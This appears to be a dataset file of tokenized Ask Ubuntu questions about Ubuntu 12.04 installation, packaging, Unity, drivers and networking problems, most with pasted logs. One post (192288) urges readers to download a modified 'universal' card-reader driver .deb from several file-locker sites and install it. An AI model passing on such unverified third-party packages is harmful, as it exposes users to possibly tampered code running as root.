192235	got problem with installation . `` no root file system is defined . ''	i 'm very new with ubuntu and generally with linux . i saw ubuntu and it seems like this os is really good and stable , and so i decided to install it alongside my windows 7 os . i have a few problems with the installation . here is what i did : i downloaded the 64bit version from ubuntu official website , and burned it on a dvd . i set the boot sequence to first load from my cd-rom . ubuntu installation started , and i chose `` install ubuntu '' in the menu . ( where there is also a `` try ubuntu '' option ) i clicked forward until i got into the installation type screen as you can see , the installation wont show my actual details about my hard drive ! i have 1 hard drive with 750 gb - 80 gb - my main drive with windows 7 os 600gb - all of my stuff 20gb free space that i saved for ubuntu but the installation wont show that !
192239	how to drag windows to another workspace from the spread view ?	how to drag windows to another workspace from the `` spread view '' ? edit : seems to have created some misunderstandings by using the term `` spread view '' . i am referring to super + w `` spread windows view '' and not to super + s `` spread worksheet view '' aka `` workspace switcher '' .
192246	krb5-multidev , libk5crypto3 , libk5crypto3 : i386 package dependency	using ubuntu 12.04 asus u43f i can no longer update , install or remove packages via software center because of package dependency errors . sudo apt-get install -f reads the following : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libunity6 libqapt-runtime libboost-program-options1.46.1 akonadi-backend-mysql libqapt1 shared-desktop-ontologies libntrack0 ntrack-module-libnl-0 libntrack-qt4-1 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : krb5-multidev libk5crypto3 : i386 libkrb5-dev suggested packages : krb5-doc krb5-doc : i386 krb5-user : i386 the following packages will be upgraded : krb5-multidev libk5crypto3 : i386 libkrb5-dev 3 upgraded , 0 newly installed , 0 to remove and 325 not upgraded . 11 not fully installed or removed . need to get 0 b/213 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : error processing libk5crypto3 ( -- configure ) : libk5crypto3 : amd64 1.10+dfsg~beta1-2ubuntu0.3 can not be configured because libk5crypto3 : i386 is in a different version ( 1.10+dfsg~beta1-2ubuntu0.1 ) dpkg : error processing libk5crypto3 : i386 ( -- configure ) : libk5crypto3 : i386 1.10+dfsg~beta1-2ubuntu0.1 can not be configured because libk5crypto3 : amd64 is in a different version ( 1.10+dfsg~beta1-2ubuntu0.3 ) dpkg : dependency problems prevent configuration of libkrb5-3 : libkrb5-3 depends on libk5crypto3 ( > = 1.9+dfsg~beta1 ) ; however : no apport report written because maxreports is reached already package libk5crypto3 is not configured yet . dpkg : error processing libkrb5-3 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgssapi-krb5-2 : libgssapi-krb5-2 depends on libk5crypto3 ( > = 1.8+dfsg ) ; however : package libk5crypto3 is not configured yet . libgssapi-krb5-2 depends on libkrb5-3 ( = 1.10+dfsg~beta1-2ubuntu0.3 ) ; however : package libkrb5-3 is not configured yet . dpkg : error processing libgssapi-krb5-2 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgssrpc4 : libgssrpc4 depends on libgssapi-krb5-2 ( > = 1.10+dfsg~ ) ; however : package libgssapi-krb5-2 is not configured yet . dpkg : error processing libgssrpc4 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libkadm5srv-mit8 : libkadm5srv-mit8 depends on libgssapi-krb5-2 ( > = 1.6.dfsg.2 ) ; however : package libgssapi-krb5-2 is not configured yet . libkadm5srv-mit8 depends on libgssrpc4 ( > = 1.6.dfsg.2 ) ; however : package libgssrpc4 is not configured yet . libkadm5srv-mit8 depends on libk5crypto3 ( > = 1.6.dfsg.2 ) ; however : package libk5crypto3 is not configured yet . libkadm5srv-mit8 depends on libkrb5-3 ( > = 1.9+dfsg~beta1 ) ; however : package libkrb5-3 is not configured yet . dpkg : error processing libkadm5srv-mit8 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libkadm5clnt-mit8 : libkadm5clnt-mit8 depends on libgssapi-krb5-2 ( > = 1.10+dfsg~ ) ; however : package libgssapi-krb5-2 is not configured yet . libkadm5clnt-mit8 depends on libgssrpc4 ( > = 1.6.dfsg.2 ) ; however : package libgssrpc4 is not configured yet.no apport report written because maxreports is reached already libkadm5clnt-mit8 depends on libk5crypto3 ( > = 1.6.dfsg.2 ) ; however : package libk5crypto3 is not configured yet . libkadm5clnt-mit8 depends on libkrb5-3 ( > = 1.8+dfsg ) ; however : package libkrb5-3 is not configured yet . dpkg : error processing libkadm5clnt-mit8 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of krb5-multidev : krb5-multidev depends on libkrb5-3 ( = 1.10+dfsg~beta1-2ubuntu0.2 ) ; however : version of libkrb5-3 on system is 1.10+dfsg~beta1-2ubuntu0.3 . krb5-multidev depends on libk5crypto3 ( = 1.10+dfsg~beta1-2ubuntu0.2 ) ; however : version of libk5crypto3 on system is 1.10+dfsg~beta1-2ubuntu0.3 . krb5-multidev depends on libgssapi-krb5-2 ( = 1.10+dfsg~beta1-2ubuntu0.2 ) ; however : version of libgssapi-krb5-2 on system is 1.10+dfsg~beta1-2ubuntu0.3 . krb5-multidev depends on libgssrpc4 ( = 1.10+dfsg~beta1-2ubuntu0.2 ) ; however : version of libgssrpc4 on system is 1.10+dfsg~beta1-2ubuntu0.3 . krb5-multidev depends on libkadm5srv-mit8 ( = 1.10+dfsg~beta1-2ubuntu0.2 ) ; however : version of libkadm5srv-mit8 on system is 1.10+dfsg~beta1-2ubuntu0.3 . krb5-multidev depends on libkadm5clnt-mit8 ( = 1.10+dfsg~beta1-2ubuntu0.2 ) ; however : version of libkadm5clnt-mit8 on system is 1.10+dfsg~beta1-2ubuntu0.3 . dpkg : error processing krb5-multidev ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libkrb5-dev : libkrb5-dev depends on krb5-multidev ( = 1.10+dfsg~beta1-2ubuntu0.2 ) ; however : package krb5-multidev is not configured yet . dpkg : error processing libkrb5-dev ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libkrb5-3 : i386 : libkrb5-3 : i386 depends on libk5crypto3 ( > = 1.9+dfsg~beta1 ) ; however : package libk5crypto3 : i386 is not configured yet . dpkg : error processing libkrb5-3 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgssapi-krb5-2 : i386 : libgssapi-krb5-2 : i386 depends on libk5crypto3 ( > = 1.8+dfsg ) ; however : package libk5crypto3 : i386 is not configured yet . libgssapi-krb5-2 : i386 depends on libkrb5-3 ( = 1.10+dfsg~beta1-2ubuntu0.3 ) ; however : package libkrb5-3 : i386 is not configured yet . dpkg : error processing libgssapi-krb5-2 : i386 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libk5crypto3 libk5crypto3 : i386 libkrb5-3 libgssapi-krb5-2 libgssrpc4 libkadm5srv-mit8 libkadm5clnt-mit8 krb5-multidev libkrb5-dev libkrb5-3 : i386 libgssapi-krb5-2 : i386 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have tried to fix the broken dependencies via synaptic package manager , but it returns with an error : e : libk5crypto3 : libk5crypto3 : amd64 1.10+dfsg~beta1-2ubuntu0.3 can not be configured because libk5crypto3 e : libkrb5-3 : dependency problems - leaving unconfigured e : libgssapi-krb5-2 : dependency problems - leaving unconfigured e : libgssrpc4 : dependency problems - leaving unconfigured e : libkadm5srv-mit8 : dependency problems - leaving unconfigured e : libkadm5clnt-mit8 : dependency problems - leaving unconfigured e : krb5-multidev : dependency problems - leaving unconfigured e : libkrb5-dev : dependency problems - leaving unconfigured i have n't gotten help from ubuntuforums.org on this issue . thanks in advance for any help .
192253	should all hosts be set to network boot at all times or after they have been registered and allocated as a service , should they boot to disk ?	i really love the concept of maas underlying an openstack implementation , but there are a few questions about maas that i am not entirely clear on . should all hosts be set to network boot at all times or after they have been registered and allocated as a service , should they boot to disk ? after juju bootstrap is executed , i turn on the machine that has been allocated ( note wol is n't working , i suspect it 's being blocked on the network ) , the machine boot 's up and then juju status executes correct , agent running and all that good stuff . if i 'reboot ' the machine ( testing power failure/problem whatever ) , juju status comes back but the agent-state is no longer in running state , and so far i have to destroy the environment and restart . in all cases i have never been able to deploy any services to any of the other nodes . i deploy the service with juju , note which node it was assigned , and then start the system . the system just boots up into a basic node . if i ssh to it i have to enter password , so it 's not setting up the ssh key or anything . this is on ubuntu 12.04.1 lts systems and hp gl360g7 hosts . the maas management server is running as a vm but all on the same network . at this point i am not sure if i am doing something wrong or if there is a problem somewhere else . is the idea that anytime a host is rebooted it should be rebuilt from the ground up , or is something else going on behind the scene to tell it to boot the local image . if the latter , why does n't the agent start on a system that has been successfully setup before ( juju bootstrapped system ) ?
192254	access secondary hard disk from virtual machine	i have a fairly specific question . i had ubuntu on my laptop ( for years ) . for a variety of reasons , i 've had to switch to windows but the computer has two hard drives . the main drive was reformatted and i 've installed windows . the second hard drive still has the linux system disk format ( not sure on type ) . obviously , windows ca n't access it but can i access it from a virtual machine ( virtualbox ) or will i need to load up a live-session to access / move the contents ? edit : if this is possible , how would one proceed to mount the disk ?
192265	music lens does not play music through default music player	i have set rhythmbox as my default music player through system settings > details , but when i browse and play music from the unity dash , banshee opens up and plays the music . how can i have rhythmbox take care of this job ?
192268	problem installing universalindentgui	i need a gui beautifier for c code . i 've found universalindentgui on sourceforge . downloaded a .deb file.opened it with ubuntu software center to install it but the button is grey and unclickable and there is a line saying dependency is not satisfiable : libqscintilla2-3 . i 've installed via the synaptic package manager libqscintilla2-5 but that did n't help . is there any way to install the universalindentgui , the libqscintilla2-3 package or to some how work around the problem ?
192269	how can i remove amazon search results from the dash or disable the feature ?	how can i disable amazon search results in the unity dash ?
192272	if i want to download a game , but it 's only for windows , how do i download it ?	when i tried downloading this one game it said i need windows so is there a thing that will let me get it on ubuntu ?
192274	is there tool to see call-stack of running thread similar to process explorer by sysinternals ?	is there tool to see call-stack of running thread similar to process explorer by sysinternals ? so far i tried htop , qps and linux process explorer . none of them can provide that information . thanks !
192275	tinyproxy install via apt-get failing to create config file	i put together an ubuntu 12.04 server a couple of weeks ago and everything seemed fine until this morning . suddenly , i 'm having trouble installing new packages - at first i thought there was something wrong with tinyproxy and so i tried installing squid instead . however , i get similar results : starting tinyproxy : tinyproxy : could not open config file `` /etc/tinyproxy.conf '' .\ ... /var/lib/dpkg/info/squid3.postinst : 1 : /var/lib/dpkg/info/squid3.postinst : can not open /etc/squid3/squid.conf : no such file it seems that apt-get is not creating the configuration files needed for these programs . i have n't modified any configuration or user groups since the last successful update/install of packages . /etc is present , and is populated with a nice healthy tree of configuration files . it is owned and grouped to root , and has the properties drwxr-xr-x - all the files and folders inside seem to be fine to , as far as i can tell . i 've even been able to edit/save a couple as sudo . full output from installing tinyproxy : reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : tinyproxy 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/61.6 kb of archives . after this operation , 201 kb of additional disk space will be used . selecting previously unselected package tinyproxy . ( reading database ... 58916 files and directories currently installed . ) unpacking tinyproxy ( from ... /tinyproxy_1.8.3-1_amd64.deb ) ... processing triggers for ureadahead ... processing triggers for man-db ... setting up tinyproxy ( 1.8.3-1 ) ... starting tinyproxy : tinyproxy : could not open config file `` /etc/tinyproxy.conf '' . invoke-rc.d : initscript tinyproxy , action `` start '' failed . dpkg : error processing tinyproxy ( -- configure ) : subprocess installed post-installation script returned error exit status 70 errors were encountered while processing : tinyproxy e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a suggestion from a friend was to check the downloaded package in /var/cache/apt/archives . there is an entry for /etc/tinyproxy.conf running sudo touch /etc/tinyproxy.conf generates an empty file owned by and writeable to root . result of strace after installation : 18467 open ( `` /etc/ld.so.cache '' , o_rdonly|o_cloexec ) = 3 18467 open ( `` /lib/x86_64-linux-gnu/libc.so.6 '' , o_rdonly|o_cloexec ) = 3 18467 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0\200\30\2\0\0\0\0\0 '' ... , 832 ) = 832 18467 open ( `` /etc/tinyproxy.conf '' , o_rdonly ) = -1 enoent ( no such file or directory ) i was able to work around the problem by copying a config from another server and setting it up for the new one - but this is not exactly ideal .
192276	ca n't connect to wired network after installing 12.04	i have installed 12.04 into a used hp compaq dc 7100 cmt . plugged in lan cable into the computer and it says network disconnected . from what i understand on the things i 've read , it 's not getting the address right , maybe it 's just a guess ( hardware address 00:16:35:78:47 : bb ) . i know the lan cable is working i can get on the net with the old computer . ( old computer is using device mac address ; auto eth0 00:11:11 : e6:4f : fe ) . i have put this address into the newer hp and it shows last used ( minutes ago ) but no internet sever not found . i tried the hardware address it says never . i feel and think this should be easy to fix . but i just do n't know . here is the info everyone has asked for , but they never say what i should do . sudo lshw -c network ; rfkill list ; cat /etc/network/interfaces ; cat /etc/lsb-release ; lspci -nn ; lsusb ; uname -a ; ifconfig ; route -n *-network description : ethernet interface product ; netxtreme bcm5751 gigabit ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:40:00.0 logical name : eth0 verson : 01 serial : 00:16:35:78:47 : bb size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000-fd configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion= 3.121 duplex=full firmware=5751-v3.29a latency=0 link=yes multicast=yes port=twi sted pair speed=100mbit/s resources : irq:17 memory : f0400000-f040ffff auto lo iface lo inet loopback distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= `` ubuntu 12.04 lts '' 00:00.0 host bridge [ 0600 ] : inter corporation 82915g/p/gv/gl/pl/910gl memory con troller hub [ 8086:2580 ] ( rev 04 ) 00.02.0 vga compatible controller [ 0300 ] : intel corporation 82915g/gv/910gl inte grated graphics controller [ 8086:2582 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) pci express port 1 [ 8086:2660 ] ( rev 03 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) pci express port 2 [ 8086:2662 ] ( rev 03 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 fam ily ) usb uhci # 1 [ 8086:2658 ] ( rev 03 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 fam ily ) usb uhci # 2 [ 8086:2659 ] ( rev 03 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 fam ily ) usb uhci # 3 [ 8086:265a ] ( rev 03 ) 00:1d.3 usb controller [ 0c03 ] : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 fam ily ) usb uhci # 4 [ 8086:265b ] ( rev 03 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 fam ily ) usb2 uhci controller [ 8086:265c ] ( rev 03 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 pci bridge [ 8086:244e ] ( rev d 3 ) 00:1e.2 multimedia audio controller [ 0401 ] : intel corporation 82801fb/fbm/fr/fw/ frw ( ich6 family ) ac'97 autio conrtroller [ 8086:266e ] ( rev 03 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation 82801fb/rf ( ich6/ich6r ) lpc interfa ce bridge [ 8086:2640 ] ( rev 03 ) 00:1f.1 ide interface [ 0101 ] : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 fami ly ) ide controller [ 8086:266f ] ( rev 03 ) 00:1f.2 ide interface [ 0101 ] : intel corporation 82801fb/fw ( ich6/ich6w ) sata con troller [ 8086:2651 ] ( rev 03 ) 40:00.0 ethernet controller [ 0200 ] : broadcom corporation netxreme bcm5751 gigab it ethernet pci express [ 14e4:1677 } ( rev 01 ) bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub linux bob-desktop 3.2.0-23-generic-pae # 36-ubuntu smp tpr 10 22:19:09 utc 20 12 i686 i686 i386 gnu/linux eth0 link encap : ethernet hwaddr 00:16:35:78:47 : bb inet6 addr : fe80 : :216:35ff:47bb/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2517 errors:0 dropped:0 overruns:0 frame:0 tx packets:164 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:164508 ( 164.5 kb ) tx bytes : 40884 ( 40.0 kb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:3290 errors:0 dropped:0 overruns:0 frame:0 tx packets:3290 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen : 0 rx bytes:267212 ( 267.2 kb ) tx bytes : 267212 ( 267.2 kb ) kernel ip routing table destination gateway genmask flags metric ref use iface ran this sudo dhclient eth0 no reply ran this ip addr 1 : lo < loopback , up , lower_up > mtu 16436 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc mq state up qlen 1000 link/enter 00:16:35:78:47 : bb brd ff : ff : ff : ff : ff : ff inet 169.254.7.172/16 brd 169.254.255.255 scope link eth0 : avahi inet6 fe80 : :216:35ff : fe78:47bb/64 scope link valid_lft forever preferred_lft forever help please .
192280	`` ghost '' output from locate ?	i deleted some files , but they seem to still exist . can anyone please explain the output of this : m @ work : ~ $ locate cfx.css | xargs rm m @ work : ~ $ locate cfx.css /var/www/wfox/hbr.co.nz/cfx/a/c/cfx.css /var/www/wfox/modules/gallery/cfx/a/c/cfx.css /var/www/wfox/phoenix/fp.co.nz/cfx/a/c/cfx.css /var/www/wfox/tmp.co.nz/cfx/a/c/cfx.css m @ work : ~ $ cat /var/www/wfox/hbr.co.nz/cfx/a/c/cfx.css cat : /var/www/wfox/hbr.co.nz/cfx/a/c/cfx.css : no such file or directory
192286	how can i create a launcher and also have it in the apps toolbar	i want an app icon for smart git . i can create one on my desktop with $ gnome-desktop-item-edit ~/ -- create-new and selecting the smartgit.sh app . that works for an icon on the desktop . how can i move that icon / create a new one in my applications toolbar ( so not just on the desktop ) ? in my case that is the unity applications toolbar ( which i 've moved to the left ) . i 've tried dragging and dropping it there but it did n't work . i can make it appear in the dash home by adding an entry this way new app does n't appear in unity dash but i still ca n't move it to be an app icon in the apps toolbar .
192288	install drivers for realtek 5208 card reader	this is an answer , rather than a question . if you are like me , chances are that you came here looking for the realtek 5208 card reader device . the device id for this card reader is : pci\ven_10ec & dev_5209 & subsys_054c1025 & rev_01 i know , you looked over the internet and it was a pain to get the card reader 's name just by the device id . it is weird . but do n't worry ! the solution is here ! ubuntu 12.04 does not come preloaded with this device driver , so i found a dell driver for this card reader and modified it so that it works universally ( the dell driver was locked to the dell laptops only ) so , if you would like to get the realtek rts 5208 working on your laptop , download the .zip archive from one of the links here : http : //www.multiupload.nl/rtelvldluf http : //depositfiles.com/files/hl04qzhwd http : //www.putlocker.com/file/3285529c3b4bbc93 http : //www36.zippyshare.com/v/98999643/file.html http : //turbobit.net/e4o8lzkt5ju3.html http : //freakshare.com/files/46rly6cr/rts-5208-by-ishmum.zip.html http : //rapidgator.net/file/45306867/rts_5208_by_ishmum.zip.html after you download the .zip archive , extract it and navigate to the /deb folder double click on the only .deb file that is there , and ubuntu software center will open . press install , and that will take about 3 minutes . after that , simply restart your computer and the card reader will start working ! happy ubuntu-ing : )
192292	problem trying to install root ( by cern ) on 11.04 i386	i hope you can help me with this problem . i am trying to install root in my computer , but i have a problem and i do n't know what to do to solve it . i 've downloaded the tar file with the root version that i want to install . i 've extracted the files in the tar file . i 've run the configure program successfully , but when i run make command , i get this result : cp /root/root/core/utils/src/rclstl.cxx core/utils/src/rclstl_tmp.cxx bin/rmkdepend -r -fcore/utils/src/rclstl_tmp.d -y -w 1000 -- -pipe -m32 -wall -w -woverloaded-virtual -fpic -iinclude -dr__have_config -pthread -ur__have_config -drootbuild -i/root/root/core/utils/src -d__cplusplus -- core/utils/src/rclstl_tmp.cxx g++ -o2 -pipe -m32 -wall -w -woverloaded-virtual -fpic -iinclude -dr__have_config -pthread -ur__have_config -drootbuild -i/root/root/core/utils/src -o core/utils/src/rclstl_tmp.o -c core/utils/src/rclstl_tmp.cxx in file included from core/utils/src/rclstl.h:28:0 , from core/utils/src/rclstl_tmp.cxx:16 : core/utils/src/scanner.h:16:27 : fatal error : clang/ast/ast.h : no existe el fichero o el directorio compilation terminated . make : * [ core/utils/src/rclstl_tmp.o ] error 1 rm core/utils/src/rclstl_tmp.cxx i do n't know what to do . please , help me .
192293	what 's the command to open the unity dash ?	i would like to know the command ( from the terminal ) which opens the unity dash , the reason being i want to create a desktop icon that starts the dash instead of the 'windows key ' for keyboard-free use of the computer ( i miss the old ubuntu-tweak effect where putting your mouse to the corner of the desktop would reveal expo or scale effects - by the way , is it possible to get it back ? ) making a launcher ( application , name , command , comment , etc ) i tried the commands 'unity ' , 'dash ' and other things , but i did n't manage to get it to work . i am using version 12.04
192296	disable ati radeon graphics card and use intel graphics ( switcheroo unavailable )	so i have a hp envy with ati radeon 5450 + intel switchable graphics . i think ( though i 'm not sure ) that the radeon is running right now on ubuntu 12.04 ( because my laptop is making too much noise when i 'm doing something non gpu intensive like word processing , or web browsing ) . so what i want to do is disable the ati radeon and use the intel instead . i looked around and it seems all the solutions use switcheroo , but i dont have it on my computer ! i think this happened because i tried installing the proprietary driver ( fglrx ) . any and all help is 200 % appreciated , thank you
192297	how do you turn on the customizable gnome-panel features ( like gnome-applets ) in precise ?	i resurrected a broken laptop today . i took out the hdd , put it in a usb 3.0 enclosure , and created a vm that would use it . it was running lucid . i took a screenshot of the desktop before i started do-release-upgrade , because from experience , i will never have my gui back the way i want it again . i know how to install gnome-panel to get back the `` gnome classic '' session option . i know how to put my minimize , maximize , and close buttons back in the upper-right hand corner of windows ( where they belong ) . i know how to use gdm instead of lightdm . unity gets worse in every version ( and the other desktop os is going to be even worse with metro ) . here 's what i do n't know ( in order of importance ) : how do you make the panels in gnome ( gnome-panel , to be precise ) customizable again ( like they were in older versions of ubuntu ) ? ** how do you install applets in the panels now ( right-click is now ignored ) ? how can you customize all of the window elements ( like you could in older versions of ubuntu ) ? i ca n't remember much about maverick , natty , or oneiric ( except their names ) , so i do n't know exactly when i lost these capabilities . take a look at the panels in the screen shot . they are nice , compact , and very functional ( disk mounter applet , frequently used shortcuts , workspaces , show desktop , kill window , and trash icons , etc . ) notice how small the fonts ( and how little real estate they waste ) . you ca n't notice the compact title bars , fonts , and window icons in this screen shot ( since i redacted the rest of the desktop ) , but it 's the same story there . please help . i do n't want to learn another distro , but ubuntu gets less customizable with every `` upgrade . ''
192301	does an onboard video affect the x windows configuration ?	does the onboard video on the motherboard affect the x windows configuration ? my system has onboard and pcie video . the onboard video is a nvidia geforce 7025 gpu , on board graphic max . memory share up to 512mb ( under os by turbo cache ) . i have a pcie dual head video card installed with two monitors . the video card is a geforce 8400 gs , with 512mb memory . when installing ubuntu 12.04 , only one monitor worked . when pulling up system settings- displays it shows a laptop . this is a desktop pc . i did get both monitors to work using nvidia using twinview -- a complicated process ! when checking nvidia now it shows the monitors disabled . the nvidia x server setting does show the gpu and all the information . i was thinking it 's seeing the onboard video on the motherboard . why else would it show laptop ?
192303	gnome-shell , gnome 3 , unity , cinnamon , mate confusion	i am thinking about adding something besides unity into my ubuntu 12.04 . my questions are this : -if i add cinnamon , mate , gnome2/3 , could i still call it it ubuntu , or would it be mint ? -why not just add mint instead of cinnamon , or mate , into ubuntu ? -or is mint just those at the core , and not the other way around ? -i had terrible battery drain using mint . something was wrong with the kernel with my laptop type . if i add cinnamon , would i get that battery drain again ? -and lastly , would i be able to get that awesome hud if i add the other things ? i realize these questions are a bit confusing , or at least they are for me .
192304	changing swappiness in sysctl.conf does n't work for me	i 'm using 12.04 lts and can sudo sysctl to set swappiness to 10 , but adding vm.swappiness=10 to sysctl.conf does n't work for me - after i reboot , swappiness still reports 60 ( default ) i 'd like to be able to reduce swaps to my ssd , but ca n't find a way to do so except manually per session . modifying sysctl.conf seems to work for most - can anyone advise what i need to check / change to make it work for me too , please ?
192307	stuck in unity 2d	after performing an update on my computer today and after the restart my computer will not boot into the 3d mode . can anyone please tell me how to fix this ! thank !
192308	recent 12.04 upgrade makes my system and internet run extremely slow !	i 'm running a dell inspiron 1564 with windows7/ubuntu dual booting . i have n't logged into the ubuntu os partition for some time until recently ( trying to force myself into a linux environment to learn ) and when i did , it asked me to upgrade to 12.04 and so i did , restarted and since , everything seems to run extremely slow ( startup , opening applications , running applications , switching windows , etc. , etc ... another thing is that the internet cuts out intermittently on my browser . some pages within my firefox tabs i can access , some i cant . almost always while running skype or some other internet using application . so i know that i 'm getting internet , i can chat with friends over skype but certain pages wont load during my skype calls ; the pages just hang upon resfreshing . i can eventually get the page to load after an indefinite amount of waiting and refreshing but this is very annoying . i am extremely new to linux so i apologize in advance for my absolute ignorance . i am willing to post whatever information you linux gurus have me type into the terminal in hopes that you can help me .
192312	how to add an internet radio station to rhythmbox running with a .php extension ?	there 's a internet radio station called sun fm in sri lanka . among those radio stations running in sri lanka , sun fm is one of my best radio stations i really like to listen everyday . i 'm listening it by online . but the problem came when i 'm trying to listen it via rhythembox player . when i 'm going to run that , error comes and says `` could n't start playback , this appears to be a text file . '' here is the url of sun fm online radio - http : //www.sunfm.lk/fb_frame.php and this is the url of sun fm web site - http : //www.sunfm.lk/ guys.. , how can i add this station in the correct way and listen ? what do i want to do to configure this problem ?
192315	ubuntu still does not boot after boot-repair	i downloaded a copy of ubuntu 64-bit os iso images and booted up in the thumb drive . i then created a live usb using unetbootin . i then booted the live usb up in non efi mode and installed ubuntu in a separate partition so that i could have 2 operating system on my computer . but i could not get the dual boot option . and then again after following up some forum posts from this website , i tried using boot-repair and it installed grub 2 . here 's what the instruction said after the boot-repair completed its task . boot successfully repaired . please write on a paper the following url : http : //paste.ubuntu.com/1221979/ in case you still experience boot problem , indicate this url to : boot.repair @ gmail.com or to your favorite support forum . you can now reboot your computer . please do not forget to make your bios boot on sda1/efi/ubuntu/grubx64.efi file ! the boot files of [ ubuntu 12.04.1 lts ] are far from the start of the disk . your bios > may not detect them . you may want to retry after creating a /boot partition ( ext4 , > 200mb , start of the disk ) . this can be performed via tools such as gparted . then > select this partition via the [ separate /boot partition : ] option of [ boot repair ] . ( https : //help.ubuntu.com/community/bootpartition ) i then rebooted the system and i could get an option booting up ubuntu and windows 7 alongside with it , but the problem is that when choosing ubuntu it does not seem to do anything . the screen just goes blank . please help . i am new to linux but i am eager to learn it .
192316	problem using windows installer for ubuntu desktop	once the installer begins to download ubuntu an error occurs . an error occured can not download the meta link and therefor the iso for more information please see the log file : c : \users..yadi yadi ... \wubi-12.04-rev269.log any ideas ?
192319	why do i need to use separate accounts for installing and running a program ?	i bought some software from atlassian ( jira , confluence etc . ) and i am installing it . one of the programs recommend me to create a user with limited access for only that program , and it also wants me to installit in /usr/local . i am new to linux so i do n't understand why i need to create such a user nor do iknow how . and this user would not be able to writemin these folders does it ? i do n't understand the benfits to make several users ? i am running ubuntu server .
192320	compiling problems	i have got below error message when i tried running a program . undefined reference to `fftw_malloc' f11.c : ( .text+0x24d ) : undefined reference to `fftw_malloc' f11.c : ( .text+0x260 ) : undefined reference to `fftw_malloc' f11.c : ( .text+0x273 ) : undefined reference to `fftw_malloc' f11.c : ( .text+0x286 ) : undefined reference to `fftw_malloc ' and so on . what is the problem exactly ? it is running fine with 11.04 version , please help ! i reinstalled the gcc , but problem still exist i used a command like this : g++ -lfftw3 -lcpgplot -lpgplot f11.c . the out puts are : undefined reference tofftw_malloc ' f11.c : ( .text+0x260 ) : undefined reference to fftw_malloc ' f11.c : ( .text+0x273 ) : undefined reference tofftw_malloc ' f11.c : ( .text+0x286 ) : undefined reference to `fftw_malloc undefined reference to cpgbeg' f11.c : ( .text+0x2d3c ) : undefined reference tocpgpage' f11.c : ( .text+0x2d49 ) : undefined reference to cpgsch' f11.c : ( .text+0x2d71 ) : undefined reference tocpgsvp' please give me suggestion .
192322	.py script autostart	i 'm using simple tiling manager.this programm have one .py file . how to autostart this .py file with parameters after login ? if it important , i 'm using gnome 2 . already tried to add bash script , which runs my .py to rc.local , but nothing .
192327	how do i change the order in which lenses appear in the dash ?	application lenses seem to be ordered alphabetically by default : from left to right : dash home -- > applications -- > extras-unity-lens-wikipedia -- > files -- > music -- > recoll -- > video is there any way you can change this order ? perhaps by modifying the .lens files in /usr/share/unity/lenses ? i 'd rather hear from someone who has done this already before messing around on my own .
